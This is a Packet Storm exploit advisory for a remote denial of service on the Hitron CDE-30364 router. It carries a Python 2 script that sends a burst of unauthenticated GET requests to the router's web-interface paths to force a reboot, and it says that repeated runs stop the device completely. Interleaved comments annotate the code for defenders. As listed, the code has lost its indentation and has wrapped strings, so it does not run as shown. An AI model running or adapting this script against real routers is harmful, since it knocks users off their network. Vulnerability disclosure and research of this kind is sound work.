Hitron Technologies CDE-30364 Denial Of Service

2014-08-06T00:00:00
ID PACKETSTORM:127778
Type packetstorm
Reporter Matias Mingorance Svensson
Modified 2014-08-06T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
#-----------------------------------------------------------------------------------------  
  
#Description:  
#-----------------------------------------------------------------------------------------  
  
#Hitron Technologies CDE-30364 is a famous ONO Router.  
  
#Requesting certain sensitive URLs causes the router to restart. If you run the  
#script several times, the router stops working.  
  
import httplib  
import socket  
import time  
  
# Banner: prints the advisory metadata (title, date, author, vendor page and
# the tested hardware/software versions) before any network activity.
# For defenders: the only affected build named here is HW 1A with
# SW 3.1.0.8-ONO; the listing names no fixed firmware version.
# NOTE(review): these are Python 2 print statements, and several string
# literals are wrapped across lines in this listing, so the text does not
# parse as shown.
print  
"\n###########################################################################################################"  
  
print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote  
reboot #"  
print "# Date:  
8-10-2013  
#"  
print "# Exploit Author: Matias Mingorance Svensson -  
matias.ms[at]owasp.org  
#"  
print "# Vendor Homepage:  
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/  
#"  
print "# Tested on: Hitron Technologies  
CDE-30364 #"  
print "# Version HW:  
1A  
#"  
print "# Version SW:  
3.1.0.8-ONO  
#"  
print  
"###########################################################################################################\n"  
  
  
# Hard-coded target address. 192.168.1.1 is an RFC 1918 private address,
# presumably the router's LAN-side management address, so as written the
# requests come from a host on the local network.
host = '192.168.1.1'  
  
#Sensitive urls  
# Paths on the router's web interface that the loop below requests, 14 in all.
# They mix login/config/reset pages, static css/js assets and goform handlers;
# the listing does not identify which of them is responsible for the restart.
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',  
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',  
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',  
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']  
  
# Sends one plain HTTP GET per path and prints the status line of each reply.
# No credentials, cookies or extra headers are passed to request(), so the
# behaviour the advisory describes appears reachable without logging in --
# TODO confirm against the device.
# For monitoring: the observable pattern is a short burst of GETs to the web
# interface paths listed above, after which the management port may stop
# answering.
# NOTE(review): indentation was lost in this listing; the three lines after
# the `for` are presumably the loop body, and whether conn.close() ran per
# iteration or once after the loop cannot be told from here.
# httplib is the Python 2 module name (http.client in Python 3).
for directory in directories:  
conn = httplib.HTTPConnection(host)  
conn.request('GET', '/' + directory)  
r1 = conn.getresponse()  
print r1.status, r1.reason  
  
conn.close()  
  
#Check 80 port  
# After a 4-second pause, attempts a TCP connect to port 80 on the same host
# and treats the outcome as the only evidence of a reboot.
# NOTE(review): the bare `except:` reports success on any exception, so an
# unrelated network error is indistinguishable from a restart; the
# "Attack Successful" message is a heuristic, not confirmation.
# The socket is shut down on the success path but never explicitly closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
time.sleep(4)  
try:  
s.connect((host, 80))  
# 2 is the value of socket.SHUT_RDWR on common platforms.
s.shutdown(2)  
print "\n"  
print "----------------------------------------------------------\n"  
print "Attack Fail!\n"  
except:  
print "----------------------------------------------------------\n"  
print "Attack Successful! The router is rebooting!\n"  
print "Run the script several times to stop router completely!\n"  
  
--   
Un saludo,  
Matías Mingorance Svensson  
*OWASP Foundation, Open Web Application Security Project*  
https://www.owasp.org  
http://es.linkedin.com/in/matiasms  
`